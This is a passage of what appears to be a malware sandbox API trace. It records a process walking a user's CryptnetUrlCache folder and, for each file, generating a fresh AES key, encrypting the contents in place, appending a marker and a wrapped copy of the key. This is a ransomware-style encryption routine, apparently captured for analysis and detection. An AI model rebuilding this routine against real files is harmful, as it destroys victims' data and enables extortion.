lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.106] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.106] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.107] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.107] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e, lpOverlapped=0x0) returned 1 [0146.107] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.107] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.107] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.107] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.107] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.107] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.107] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.107] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.107] CloseHandle (hObject=0x198) returned 1 [0146.124] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.128] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.128] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.129] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.129] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD", dwFileAttributes=0x80) returned 1 [0146.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.129] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=244) returned 1 [0146.129] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=244) returned 1 [0146.129] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.129] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.130] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.130] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf4, lpOverlapped=0x0) returned 1 [0146.130] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.130] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x100) returned 1 [0146.130] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.130] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x100, lpOverlapped=0x0) returned 1 [0146.130] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.131] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.131] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.131] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.131] CloseHandle (hObject=0x198) returned 1 [0146.148] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.152] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.152] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.152] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.152] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", dwFileAttributes=0x80) returned 1 [0146.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.153] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=398) returned 1 [0146.153] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=398) returned 1 [0146.153] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.153] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.154] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.154] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.154] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.154] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.154] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e, lpOverlapped=0x0) returned 1 [0146.154] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.154] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0146.154] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.154] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0146.154] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.154] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.154] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.154] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.155] CloseHandle (hObject=0x198) returned 1 [0146.182] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.186] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.186] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.186] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.186] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.186] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21", dwFileAttributes=0x80) returned 1 [0146.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.187] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=256) returned 1 [0146.187] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=256) returned 1 [0146.187] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.187] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.187] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.187] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x100, lpOverlapped=0x0) returned 1 [0146.188] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.188] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x100, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x110) returned 1 [0146.188] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.188] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x110, lpOverlapped=0x0) returned 1 [0146.188] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.189] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.189] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.189] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.189] CloseHandle (hObject=0x198) returned 1 [0146.206] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.210] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.210] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.210] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.210] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.210] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", dwFileAttributes=0x80) returned 1 [0146.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.211] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=434) returned 1 [0146.211] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=434) returned 1 [0146.211] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.211] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.212] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.212] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.212] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.212] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.212] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1b2, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1b2, lpOverlapped=0x0) returned 1 [0146.212] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.212] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1c0) returned 1 [0146.212] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.212] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1c0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1c0, lpOverlapped=0x0) returned 1 [0146.212] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.212] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.212] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.212] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.213] CloseHandle (hObject=0x198) returned 1 [0146.230] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.234] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.234] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.234] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.235] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.235] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9", dwFileAttributes=0x80) returned 1 [0146.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.235] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=220) returned 1 [0146.235] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=220) returned 1 [0146.236] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0146.236] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0146.236] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.236] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xdc, lpOverlapped=0x0) returned 1 [0146.237] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0146.237] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xdc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xe0) returned 1 [0146.237] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.237] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xe0, lpOverlapped=0x0) returned 1 [0146.237] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0146.237] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.237] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0146.237] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0146.237] CloseHandle (hObject=0x198) returned 1 [0146.260] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.265] CryptDestroyKey (hKey=0x3b8690) returned 1 [0146.265] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.266] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0146.266] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0146.266] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", dwFileAttributes=0x80) returned 1 [0146.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0146.269] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0146.269] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0146.269] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.269] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0146.270] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 